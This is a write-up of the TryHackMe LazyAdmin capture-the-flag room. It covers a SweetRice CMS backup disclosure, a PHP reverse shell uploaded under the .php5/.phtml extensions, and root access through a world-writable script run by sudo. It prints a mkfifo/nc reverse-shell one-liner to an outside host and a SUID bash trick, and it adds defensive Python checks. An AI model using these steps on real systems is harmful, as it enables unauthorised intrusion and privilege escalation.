LazyAdmin TryHackMe Walkthrough

Challenge Link: https://tryhackme.com/room/lazyadmin

Initial Enumeration

As usual, I started the initial enumeration with an nmap port scan, using service detection and the default scripts.

┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin]
└─$ nmap -sC -sV -oN nmap/initial 10.10.93.93  
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-02 15:50 IST
Nmap scan report for 10.10.93.93
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.70 seconds

Only two ports are open: SSH on port 22 and an Apache web server on port 80. Let's start the enumeration with port 80.

The website shows only the default Apache 2 page. Next, I ran a dirb scan to look for hidden files and directories.

┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin]
└─$ dirb http://10.10.93.93

-----------------
DIRB v2.22
By The Dark Raver
-----------------

URL_BASE: http://10.10.93.93/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.93.93/ ----
==> DIRECTORY: http://10.10.93.93/content/
+ http://10.10.93.93/index.html (CODE:200|SIZE:11321)
+ http://10.10.93.93/server-status (CODE:403|SIZE:276)

---- Entering directory: http://10.10.93.93/content/ ----
==> DIRECTORY: http://10.10.93.93/content/_themes/
==> DIRECTORY: http://10.10.93.93/content/as/
==> DIRECTORY: http://10.10.93.93/content/attachment/
==> DIRECTORY: http://10.10.93.93/content/images/
==> DIRECTORY: http://10.10.93.93/content/inc/
+ http://10.10.93.93/content/index.php (CODE:200|SIZE:2197)
==> DIRECTORY: http://10.10.93.93/content/js/

We have a directory named /content. When we visit it, we see a landing page that says the website is still under construction.

The footer of the page also says "powered by Basic-CMS.ORG Sweet Rice", which is probably the name of the CMS.

We also have a directory named /as where we can log in to the CMS, but we need a valid username and password for it. I tried guessing some common usernames and passwords, but none of them worked.

Next, I searched for 'basiccms.org sweet rice', but instead of the website or documentation, I found a few Exploit-DB links in the top results XD. I looked through all the exploits, and the one I found interesting was an information-disclosure exploit.

SweetRice 1.5.1 - Backup Disclosure (Exploit-DB, webapps exploit for the PHP platform)

According to the exploit, we can simply visit the /inc/mysql_backup/ directory of the CMS to retrieve a MySQL backup.

I downloaded the backup file and opened it in a text editor. Inside the backup file, I found the password hash for the user manager.

We can crack this hash using hydra or an online password-cracking website such as crackstation.net.

This was a very easy password. Now we can log in to the SweetRice CMS at the /as directory we found earlier, using these credentials.

Initial Shell

After logging in, I found an option named Media Center where we can upload our own files. We can upload a PHP reverse shell here and execute it to get a shell back on our system.

However, we cannot simply upload the reverse shell there, because the upload functionality does not accept .php files.

The filter only rejects the .php extension, so we can upload the same file with another extension that the server still executes as PHP, such as .php5 or .phtml. Once the upload is complete, we can request it from the /content/attachment directory to trigger the reverse shell.
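To show why a deny list on the file extension is the wrong control here, the following Python is an added example (not SweetRice's code): a deny-list check that lets .php5 and .phtml through, next to an allow-list check that stores only image extensions, rejects double extensions and never reuses the uploaded name. The PHP handler pattern is an assumption modelled on the FilesMatch rule in the Debian/Ubuntu Apache PHP configuration.

```python
import re
import secrets
from pathlib import PurePosixPath

# What a deny-list upload filter rejects (assumed; the page only says the uploader refuses .php)
DENY_LIST = {".php"}
# Extensions an Apache mod_php setup may still hand to the PHP interpreter; the pattern is an
# assumption modelled on the FilesMatch rule shipped in Debian/Ubuntu php*.conf (.phtml, .php5, ...)
PHP_HANDLER_RE = re.compile(r"^\.ph(p[3-7]?|ar|t|tml)$", re.IGNORECASE)
# The only extensions a media uploader needs to store
ALLOW_LIST = {".jpg", ".jpeg", ".png", ".gif"}

def deny_list_accepts(filename):
    """The weak check: only the final extension is compared against a short deny list."""
    return PurePosixPath(filename).suffix.lower() not in DENY_LIST

def allow_list_accepts(filename):
    """The hardened check: bare file name, final extension on the allow list, and no
    intermediate extension that a handler could still execute (e.g. shell.php.jpg)."""
    name = PurePosixPath(filename).name
    if name != filename or name.startswith("."):
        return False  # path components and dotfiles such as .htaccess are refused
    suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
    if not suffixes or suffixes[-1] not in ALLOW_LIST:
        return False
    return not any(PHP_HANDLER_RE.match(s) for s in suffixes[:-1])

def stored_name(filename):
    """Never keep the client-supplied name: random basename plus the validated extension."""
    if not allow_list_accepts(filename):
        raise ValueError("rejected upload name: %r" % filename)
    return secrets.token_hex(16) + PurePosixPath(filename).suffix.lower()
```

Validating the extension is only half of the fix; the upload directory should also be served without any script handler so that a stored file is never executed.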

┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connection received from (UNKNOWN) [10.10.93.93] 37266
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 15:03:30 up  2:50,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@THM-Chal:/$

Next, I upgraded the dumb shell to a fully interactive TTY with the following commands:

python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo && fg
reset
export TERM=xterm
stty rows 48 columns 179

Next, I checked the /home directory and found a single user, itguy. The user flag is readable inside itguy's home directory.

www-data@THM-Chal:/$ ls -lah /home
total 12K
drwxr-xr-x  3 root  root  4.0K Nov 29  2019 .
drwxr-xr-x 23 root  root  4.0K Nov 29  2019 ..
drwxr-xr-x 18 itguy itguy 4.0K Nov 30  2019 itguy
www-data@THM-Chal:/$ cd home/itguy/
www-data@THM-Chal:/home/itguy$ wc -c user.txt 
38 user.txt

Root Shell

Next, I ran sudo -l to check whether we can run any command as root, and found that www-data can run a Perl script in itguy's home directory as root without a password.

www-data@THM-Chal:/home/itguy$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

When I checked the contents of /home/itguy/backup.pl, I found that it simply executes another file, /etc/copy.sh.

www-data@THM-Chal:/home/itguy$ cat backup.pl 
#!/usr/bin/perl

system("sh", "/etc/copy.sh");

I then checked the contents of /etc/copy.sh and found a reverse-shell one-liner inside it XD.

www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

Next, I checked the permissions of this file and found that it is world-writable. So instead of catching a reverse shell, I replaced its contents with a command that copies /bin/bash to the /tmp directory and sets the SUID bit on the copy, which gives us a root shell.

www-data@THM-Chal:/home/itguy$ ls -l /etc/copy.sh 
-rw-r--rwx 1 root root 81 Nov 29  2019 /etc/copy.sh
www-data@THM-Chal:/home/itguy$ echo "cp /bin/bash /tmp/bash;chmod +s /tmp/bash" > /etc/copy.sh 

Now, running backup.pl through sudo creates a SUID copy of bash in the /tmp directory. Executing that binary with -p (which keeps the effective UID) gives us the root shell.

www-data@THM-Chal:/home/itguy$ sudo /usr/bin/perl /home/itguy/backup.pl 
www-data@THM-Chal:/home/itguy$ cd /tmp
www-data@THM-Chal:/tmp$ ./bash -p
bash-4.3# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
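The root path above chains a NOPASSWD sudo rule to a Perl script that runs a world-writable file. The following Python is an added audit check, not part of the room or the original post: it parses sudo -l output, follows absolute paths through the referenced text scripts and reports any file a non-owner can modify. The fixture rebuilds the backup.pl/copy.sh pair in a temp directory, and both regular expressions are assumptions.

```python
import os
import re
import stat
import tempfile

# One command line of `sudo -l` output, e.g. "(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl"
SUDO_RULE_RE = re.compile(r"^\s*\([^)]*\)\s*(?:[A-Z]+:\s*)*(?P<cmd>/.*)$")
# Absolute paths mentioned in a command line or inside a script body
ABS_PATH_RE = re.compile(r"/(?:[\w.-]+/)*[\w.-]+")

def parse_sudo_l(output):
    """Return the command strings listed after 'may run the following commands'."""
    lines = output.splitlines()
    start = next((i for i, l in enumerate(lines) if "may run the following commands" in l), len(lines))
    return [m.group("cmd").strip() for l in lines[start:] if (m := SUDO_RULE_RE.match(l))]

def audit_command(cmd, max_depth=3):
    """Follow absolute paths from a sudo command into text scripts; return files a non-owner can modify."""
    findings, seen = [], set()
    queue = [(p, 0) for p in ABS_PATH_RE.findall(cmd)]
    while queue:
        path, depth = queue.pop(0)
        if path in seen or not os.path.isfile(path):
            continue
        seen.add(path)
        if os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH):  # group/world write bit set
            findings.append(path)
        try:
            with open(path, "rb") as fh:
                head = fh.read(65536)
        except OSError:
            continue
        if depth < max_depth and b"\0" not in head:  # descend into text scripts only, not binaries
            queue += [(p, depth + 1) for p in ABS_PATH_RE.findall(head.decode("utf-8", "replace"))]
    return findings

def build_demo():
    """Constructed fixture (not real system files): the page's sudo -> backup.pl -> copy.sh chain in a temp dir."""
    root = tempfile.mkdtemp()
    copy_sh, backup_pl = os.path.join(root, "copy.sh"), os.path.join(root, "backup.pl")
    with open(copy_sh, "w") as fh:
        fh.write('echo "backup placeholder"\n')
    os.chmod(copy_sh, 0o647)  # -rw-r--rwx, the mode ls -l showed for /etc/copy.sh
    with open(backup_pl, "w") as fh:
        fh.write('#!/usr/bin/perl\n\nsystem("sh", "%s");\n' % copy_sh)
    os.chmod(backup_pl, 0o644)
    sudo_l = ("User www-data may run the following commands on THM-Chal:\n"
              "    (ALL) NOPASSWD: /usr/bin/perl %s\n" % backup_pl)
    return sudo_l, copy_sh
```

Running audit_command on the real output of sudo -l on a host flags exactly the copy.sh pattern seen here; tightening the mode to 0644 makes the finding disappear.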

Hurray! We're now root and can read the final flag in the /root directory.

bash-4.3# cd /root
bash-4.3# ls
root.txt
bash-4.3# wc -c root.txt
38 root.txt

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Alfrey Davilla.